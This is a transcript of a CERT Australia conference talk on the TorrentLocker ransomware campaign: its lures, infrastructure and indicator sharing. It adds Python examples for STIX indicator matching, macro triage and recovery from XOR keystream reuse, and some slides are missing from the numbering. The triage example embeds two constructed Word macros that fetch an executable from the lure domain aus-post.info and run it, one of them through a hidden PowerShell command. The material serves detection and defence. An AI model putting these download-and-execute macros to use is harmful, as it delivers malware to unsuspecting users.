Tracking cyber kidnappers by Andrew Clark [APRICOT 2015]
1. Tracking cyber kidnappers
Dr Andrew Clark, Senior Technical Advisor, CERT Australia
APRICOT 2015, Fukuoka, APCERT Security Track
2. Presentation overview
• About CERT Australia
• Ransomware campaign targeting Australia
  – Characteristics
  – Response
  – Analysis
• Related campaigns
• Conclusion
3. About CERT Australia
• Provides major Australian businesses with information about cyber threats and support in responding to cyber security incidents
• Focus on systems of national interest, including critical infrastructure
4. About CERT Australia (continued)
• Trusted source of information for partners (over 500 Australian businesses)
• Participant in a global network of national CERTs, including APCERT
5. CERT Australia services
Proactive
• Publications
  – Advisories
  – Good practice guides
  – Protect products
• Information exchanges
  – Regional
  – National
• Training and exercises
  – ICS / domestic training
  – e.g. Cyber Storm
  – Regional exercises
  – Custom exercises
Reactive
• Assistance / support to
  – ACSC agency partners
  – Hotline
• Activities
  – Onsite assistance (e.g. major ISPs, technology companies)
  – CND advice
  – Offsite malware, log and other analysis
6. Background
• In late 2013, CERT Australia began tracking an international ransomware campaign targeting Australia
• The attack was prolonged
  – persisting throughout 2014 (and into 2015)
  – affected a large range of partners, across all sectors
• The email lures used localised themes
• The infrastructure shifted rapidly to confound detection
7. Background – targeting*
* Source: "TorrentLocker: Ransomware in a country near you", M.-E. M. Léveillé, December 2014.
8. The 'business' model (a.k.a. TorrentLocker)
1. Send themed spam containing a website link to the victim (official-looking domain names, e.g. aus-post.info)
2. Victim visits the website, downloads a 'bill' or 'viewer' (the malware) and runs it
3. Malware encrypts files (including those on network shares) and asks for a ransom to decrypt them
4. Victim pays the ransom (Bitcoins) via a Tor-protected site
5. Victim downloads a decryption program to decrypt the files
9. Campaign characteristics
• Keep 'consumers' (victims) confident
  – Re-used previous campaign branding (CryptoLocker)
  – Victims won't pay if they're not going to get their files back
• Constantly evolving
  – New domains registered almost daily, to keep ahead of takedowns
  – Malware binary changed almost daily, to keep ahead of anti-virus updates
25. Analysis – indicator sharing
• Express indicators in STIX format
• STIX: Structured Threat Information eXpression
  – highly descriptive: indicators, observables, TTPs, CoA, Kill Chain
  – machine readable: supported by a growing number of tools
  – automated sharing via a TAXII service
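What "express indicators in STIX and match them" looks like end to end, as an added example that is not from the talk or from CERT Australia's tooling. The slide dates from the STIX 1.x (XML) era; this example uses the current STIX 2.1 JSON form, and the only indicator value taken from the slides is the lure domain aus-post.info. The fixed uuid5 namespace, the placeholder dropper hash (SHA-256 of the empty string) and the proxy log lines are all constructed for the example so that it runs offline and deterministically.

```python
import json
import re
import uuid

# Fixed namespace so that uuid5 ids are reproducible across runs (an assumption
# made for this example; real STIX producers normally use random uuid4 ids).
ID_NAMESPACE = uuid.UUID("a4d9f1c2-0b3e-4c8f-9a1d-2e7b6c5d4f30")


def make_indicator(pattern, name, created="2015-02-01T00:00:00.000Z"):
    """Build a minimal STIX 2.1 Indicator object for a single comparison pattern."""
    return {
        "type": "indicator",
        "spec_version": "2.1",
        "id": "indicator--" + str(uuid.uuid5(ID_NAMESPACE, pattern)),
        "created": created,
        "modified": created,
        "name": name,
        "indicator_types": ["malicious-activity"],
        "pattern": pattern,
        "pattern_type": "stix",
        "valid_from": created,
    }


def make_bundle(indicators):
    """Wrap indicator objects in a STIX bundle and serialise it as JSON (what a TAXII server would hand out)."""
    seed = "".join(i["id"] for i in indicators)
    bundle = {
        "type": "bundle",
        "id": "bundle--" + str(uuid.uuid5(ID_NAMESPACE, seed)),
        "objects": indicators,
    }
    return json.dumps(bundle, indent=2)


# Only the single-comparison form [object:path = 'value'] is handled here.
PATTERN_RE = re.compile(
    r"^\[(?P<obj>[\w-]+):(?P<path>[\w.'-]+)\s*=\s*'(?P<val>[^']+)'\]$"
)


def parse_pattern(pattern):
    m = PATTERN_RE.match(pattern)
    if not m:
        raise ValueError("unsupported pattern: " + pattern)
    return m.group("obj"), m.group("path").replace("'", ""), m.group("val").lower()


def load_lookup(bundle_json):
    """Index a received bundle as {(object type, property path): {value: indicator id}}."""
    lookup = {}
    for obj in json.loads(bundle_json)["objects"]:
        if obj.get("type") != "indicator" or obj.get("pattern_type") != "stix":
            continue
        otype, path, value = parse_pattern(obj["pattern"])
        lookup.setdefault((otype, path), {})[value] = obj["id"]
    return lookup


# Constructed proxy log (not real data): timestamp,client,host,sha256-of-download.
# The hash on the last line is SHA-256 of the empty string, used as a placeholder.
SAMPLE_LOG = """\
2015-02-03T09:12:01Z,10.0.0.12,www.auspost.com.au,-
2015-02-03T09:14:22Z,10.0.0.12,aus-post.info,-
2015-02-03T09:14:30Z,10.0.0.12,aus-post.info,e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
"""


def match_log(log_text, lookup):
    """Return (timestamp, client, matched value, indicator id) for every hit."""
    hits = []
    for line in log_text.splitlines():
        ts, client, host, sha = line.split(",")
        checks = (
            (("domain-name", "value"), host.lower()),
            (("file", "hashes.SHA-256"), sha.lower()),
        )
        for key, value in checks:
            ind_id = lookup.get(key, {}).get(value)
            if ind_id:
                hits.append((ts, client, value, ind_id))
    return hits


def build_sample_bundle():
    """Indicators for the lure domain named on the slides plus a placeholder dropper hash."""
    return make_bundle([
        make_indicator("[domain-name:value = 'aus-post.info']", "TorrentLocker lure domain"),
        make_indicator(
            "[file:hashes.'SHA-256' = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855']",
            "Placeholder dropper hash (constructed)",
        ),
    ])


if __name__ == "__main__":
    for hit in match_log(SAMPLE_LOG, load_lookup(build_sample_bundle())):
        print(hit)
```

The consumer side deliberately rejects any pattern it cannot parse rather than silently ignoring it; in a real feed, unsupported patterns (boolean combinations, regex-style MATCHES) should be logged so that the analyst knows which shared indicators are not being matched.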
26. Analysis – links to other campaigns
• Links between this ransomware campaign and banking trojans have been identified
  – Hesperbot
  – Dridex
28. Analysis – Word macro observations
• As before, actors are continually tweaking techniques, and also modernising old techniques
  – Early Word macro code: URLs were in clear text
  – Newer variants are increasingly obfuscated
  – Password-protected macros appearing
  – Sandboxes having some trouble scanning these files
  – Advanced variants utilising PowerShell
  – Latest variant using embedded EXEs, smaller footprint
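A small triage pass over extracted VBA source that follows the progression on the slide (clear-text URLs, then obfuscated strings, then PowerShell download cradles), as an added example; it is not a tool from the talk. The two macro samples are constructed for the example and are not real malware; the only name taken from the slides is the lure domain aus-post.info. The heuristics are deliberately simple (Chr() chains, StrReverse, literal concatenation) and will not unpack password-protected or heavily encoded macros, which is exactly the sandbox gap the slide notes.

```python
import re

# Heuristics applied to VBA source text (e.g. as dumped by a macro extraction tool).
AUTO_EXEC = re.compile(r"\b(AutoOpen|Document_Open|AutoExec|Workbook_Open|AutoClose)\b", re.I)
URL_RE = re.compile(r"https?://[\w.\-/%?=&+]+", re.I)
# Two or more Chr()/ChrW()/Chr$() calls joined by & or +; the operator is only
# consumed when another Chr() follows, so a trailing & "literal" is left intact.
CHR_CHAIN = re.compile(r"(?:Chr[W$]?\(\s*\d+\s*\)(?:\s*[&+]\s*(?=Chr[W$]?\())?){2,}", re.I)
CHR_ONE = re.compile(r"Chr[W$]?\(\s*(\d+)\s*\)", re.I)
STRREV = re.compile(r'StrReverse\(\s*"([^"]*)"\s*\)', re.I)
LITERAL_JOIN = re.compile(r'"\s*[&+]\s*"')  # "ab" & "cd"  ->  "abcd"
SHELL_RE = re.compile(r"\b(Shell|WScript\.Shell|CreateObject|ShellExecute)\b", re.I)
PS_RE = re.compile(r"powershell|Invoke-Expression|\bIEX\b|-EncodedCommand|\s-enc\b", re.I)


def deobfuscate(src):
    """Fold Chr() chains and StrReverse literals into plain strings, then join adjacent literals."""
    def fold(m):
        return '"' + "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0))) + '"'
    flat = CHR_CHAIN.sub(fold, src)
    flat = STRREV.sub(lambda m: '"' + m.group(1)[::-1] + '"', flat)
    return LITERAL_JOIN.sub("", flat)


def triage(src):
    """Return the indicators an analyst wants first: auto-exec, URLs (before and after
    deobfuscation), obfuscation markers, and shell / PowerShell execution."""
    flat = deobfuscate(src)
    return {
        "auto_exec": bool(AUTO_EXEC.search(src)),
        "cleartext_urls": sorted(set(URL_RE.findall(src))),
        "urls_after_deobfuscation": sorted(set(URL_RE.findall(flat))),
        "chr_obfuscation": bool(CHR_CHAIN.search(src)),
        "strreverse": bool(STRREV.search(src)),
        "shell_exec": bool(SHELL_RE.search(flat)),
        "powershell": bool(PS_RE.search(flat)),
    }


# Constructed samples (not real malware) mirroring the early and later styles on the slide.
EARLY_MACRO = r'''
Sub AutoOpen()
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", "http://aus-post.info/bill.exe", False
    http.Send
    Shell "C:\Users\Public\bill.exe", vbHide
End Sub
'''

OBFUSCATED_MACRO = r'''
Sub Document_Open()
    Dim u As String
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://" & StrReverse("ofni.tsop-sua") & "/viewer.exe"
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('" & u & "','C:\Users\Public\v.exe')", 0
End Sub
'''


if __name__ == "__main__":
    for label, sample in (("early", EARLY_MACRO), ("obfuscated", OBFUSCATED_MACRO)):
        print(label, triage(sample))
```

Note that the URL in the second sample never appears in clear text, so a string-based signature written for the early variant misses it; the deobfuscated view is what the indicator extraction should run on.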
29. Lure themes and payloads over time
• Australia Post theme, Oct 2013: Hesperbot
• Australia Post theme, Nov 2013: CryptoLocker
• Energy Australia theme, May 2014: CryptoLocker / CryptoWall
• Telstra theme, Sep 2014: TorrentLocker
• NSW Gov "RTA Speeding Fine" theme, Oct 2014: TorrentLocker
• "Invoice" theme, .DOC macros, Oct 2014: Dridex / TorrentLocker
30. Conclusion
• Organised, well funded and VERY persistent
• Prolific: affecting government, individuals, small and large businesses
• Multiple countries targeted, with localised themes
• Actors are nimble and continually tweaking techniques
  – TorrentLocker updated within a week to patch an "XOR" bug allowing decryption (September 2014)
  – Phishing websites filtering source IP address by country
  – Freshly compromised WordPress websites used in phishing emails as redirector links, complicating detection and filtering
  – Continual wave of new IP addresses used to host phishing sites; clean reputation, IP addresses mostly not seen before
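The slide says only that an "XOR" bug allowed decryption. The following is an added example, not code from the talk, showing the classic failure that description points to: a keystream XORed over every file without a per-file nonce, so one file for which the victim still has a clean copy (a sent attachment, a file from a backup) hands back the keystream and with it every other file up to that length. It assumes that is the nature of the bug; the keystream generator (SHA-256 in counter mode), the key, and the victim files are stand-ins constructed for the example and say nothing about TorrentLocker's actual implementation. The corrected variant alongside it shows why a fresh nonce per file closes the hole.

```python
import hashlib
import os


def keystream(seed, length):
    """Stand-in keystream generator (SHA-256 in counter mode). This is NOT the malware's
    generator; only the reuse of one keystream across files matters for the demonstration."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(seed + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt_buggy(key, files):
    """Flawed scheme: one key and no per-file nonce, so every file is XORed with the
    same keystream starting at offset 0."""
    return {name: xor_bytes(data, keystream(key, len(data))) for name, data in files.items()}


def encrypt_fixed(key, files):
    """Corrected scheme: a fresh random nonce per file is mixed into the keystream seed
    and stored in front of the ciphertext, so no two files share a keystream."""
    out = {}
    for name, data in files.items():
        nonce = os.urandom(16)
        out[name] = nonce + xor_bytes(data, keystream(key + nonce, len(data)))
    return out


def recover_keystream(ciphertext, known_plaintext):
    """C XOR P yields the keystream bytes wherever the plaintext is known."""
    return xor_bytes(ciphertext, known_plaintext)


def decrypt_with_keystream(ciphertext, ks):
    """Decrypt as much of the ciphertext as the recovered keystream covers."""
    n = min(len(ciphertext), len(ks))
    return xor_bytes(ciphertext[:n], ks[:n])


# Constructed victim files (not real data). The report also exists as an unencrypted
# copy elsewhere (e.g. a sent email attachment), which is the known plaintext.
FILES = {
    "quarterly-report.docx": b"PK\x03\x04" + bytes(range(256)) * 4,  # 1028 bytes
    "passwords.txt": b"intranet: admin / Winter2014!\nvpn: jsmith / hunter2\n",
}


def attack_buggy(key=b"attacker-key-never-seen-by-victim"):
    """Victim-side recovery against the flawed scheme: no key needed."""
    enc = encrypt_buggy(key, FILES)
    ks = recover_keystream(enc["quarterly-report.docx"], FILES["quarterly-report.docx"])
    # The recovered keystream decrypts every other file up to the known file's length.
    return decrypt_with_keystream(enc["passwords.txt"], ks)


def attack_fixed(key=b"attacker-key-never-seen-by-victim"):
    """Same attempt against the nonce-per-file scheme: the keystream from one file is useless for another."""
    enc = encrypt_fixed(key, FILES)
    c1, c2 = enc["quarterly-report.docx"][16:], enc["passwords.txt"][16:]
    ks = recover_keystream(c1, FILES["quarterly-report.docx"])
    return decrypt_with_keystream(c2, ks)


if __name__ == "__main__":
    print(attack_buggy())
    print(attack_fixed())
```

The same reasoning is why a victim-side decryptor for such a bug needs one known file at least as long as the largest file to recover, and why the actors fixing it within a week removed that recovery option for later victims.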
Speaker notes
To track the activity, the CERT worked closely with Stay Smart Online and other ACSC agencies, including the Australian Federal Police and the Australian Crime Commission. In particular, when the actors shifted to a new delivery mechanism using malicious Microsoft Word documents containing macros, the CERT was able to quickly identify the change and pre-warn its partners.
The CERT facilitated and led the proactive defence effort by providing timely indicators of compromise to our partners, as well as assisting with infrastructure takedowns and victim recovery. This was accomplished through our own analysis and by leveraging our national and international partnerships. Throughout the campaign the CERT also provided its partners with longer term preventative strategies.
Notice the 22558 captcha is re-used across campaigns.
This Australia Post domain was also incorrectly configured by attackers with a UK Royal Mail splash page.
Application whitelisting of macros is becoming an important consideration.
Links exist between earlier Australia Post theme phishing emails distributing CryptoLocker/TorrentLocker and recent Word documents.
Early Word documents distributing TorrentLocker are clearly also linked to newer variants distributing Dridex banking malware.
This was further shown when an Australia Post theme email containing a Word Document was first seen, late November 2014.
We conducted an in-depth investigation because attacks were so prolific, prolonged and involved.
Found rapidly changing lures, C2 infrastructure and implants: TorrentLocker, CryptoLocker, Hesperbot, etc.
CERT able to provide proactive information to our members of this kind of attack, due in part to what our international partner CERTs had been seeing.
Aspects of these campaigns:
- Shadow Volume copies
- Ransom time limit
- Bitcoin ransom in AUD
- Domains also used to drop Hesperbot and other trojans, usually banking
- Reputational damage to large business
Worked with Stay Smart Online and CSOC / ACSC to provide readily available online advice and publicise these attacks to forewarn targets and assist those affected.